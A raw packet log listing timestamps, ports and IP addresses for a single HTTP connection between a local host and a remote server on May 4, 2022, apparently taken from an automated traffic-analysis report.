                                                        May 4, 2022 16:21:21.425360918 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425376892 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425389051 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425395012 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425395966 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425411940 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425429106 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425446033 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425456047 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425461054 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425462008 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425479889 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425497055 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425513983 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425514936 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425519943 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425530910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425549030 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425565958 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425592899 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425600052 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425621986 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425640106 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425657988 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425673962 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425682068 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425688982 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.425690889 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425709963 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.425726891 CEST8049823193.56.146.127192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2022 16:21:21.425745010 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425761938 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425779104 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425781965 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425789118 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425796986 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425813913 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425831079 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425848961 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425854921 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425859928 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425863981 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425865889 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425884008 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425900936 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425918102 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425935030 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425951004 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425966978 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.425970078 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425976038 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.425985098 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426002979 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426019907 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426023960 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426029921 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426037073 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426054955 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426071882 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426089048 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426099062 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426105022 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426105976 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426122904 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426140070 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426155090 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426156998 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426161051 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426173925 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426192045 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426208019 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426234007 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426250935 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426264048 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426268101 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426270008 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426285028 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426301956 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426320076 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426323891 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426327944 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426336050 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426352978 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426369905 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426386118 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426403046 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426403046 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426410913 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426419020 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426436901 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426455021 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426470995 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426487923 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426496983 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426503897 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426505089 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426521063 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426537991 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426562071 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426578045 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426595926 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426599979 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426608086 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426611900 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426613092 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426666021 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426688910 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426709890 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426713943 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426717043 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426738024 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426749945 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426759958 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426774979 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426783085 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426805019 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426826000 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426840067 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426846981 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426847935 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426871061 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426901102 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426923037 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426923037 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426928997 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426945925 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426955938 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.426968098 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.426990032 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427011013 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427032948 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427032948 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427041054 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427054882 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427077055 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427078009 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427098989 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427109003 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427120924 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427143097 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427165031 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427169085 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427175999 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427186966 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427208900 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427229881 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427247047 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427252054 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427253008 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427274942 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427303076 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427311897 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427318096 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427325964 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427361012 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427371025 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427377939 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427386999 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427395105 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427395105 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427418947 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427439928 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427460909 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427483082 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427499056 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427505016 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427506924 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427527905 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427537918 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427548885 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427565098 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427571058 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427593946 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427606106 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427614927 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427638054 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427659988 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427669048 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427675962 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427721024 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427745104 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427767038 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427776098 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427783012 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427788973 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427810907 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427831888 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427854061 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427856922 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427865028 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427875042 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427897930 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427920103 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427941084 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427961111 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427963018 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.427968025 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.427984953 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428005934 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428026915 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428046942 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428049088 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428051949 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428071976 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428092957 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428113937 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428116083 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428122997 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428136110 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428158045 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428178072 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428189039 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428195953 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428200006 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428220987 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428242922 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428263903 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428266048 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428271055 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428283930 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428306103 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428328037 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428337097 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428344011 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428348064 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428369045 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428390026 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428401947 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428410053 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428411007 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428432941 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428453922 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428482056 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428488970 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428495884 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428522110 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428524971 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428546906 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428572893 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.428580999 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428586006 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428622007 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.428664923 CEST | 49823 | 80 | 192.168.2.4 | 193.56.146.127
May 4, 2022 16:21:21.497982025 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498030901 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498331070 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498375893 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498406887 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498437881 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498465061 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498493910 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498522997 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498549938 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498578072 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498605967 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498634100 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498666048 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498692989 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498723030 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498752117 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498780012 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498806953 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498835087 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498862982 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498941898 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498970032 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.498999119 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499027014 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499053955 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499082088 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499109983 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499139071 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499166965 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499195099 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499229908 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499273062 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499301910 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499329090 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499356985 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499402046 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499430895 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499458075 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499485970 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499512911 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499541998 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499578953 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499613047 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499651909 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499687910 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499731064 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499769926 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499797106 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499835968 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499877930 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499912024 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499952078 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.499989033 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500027895 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500066996 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500108957 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500150919 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500194073 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
May 4, 2022 16:21:21.500242949 CEST | 80 | 49823 | 193.56.146.127 | 192.168.2.4
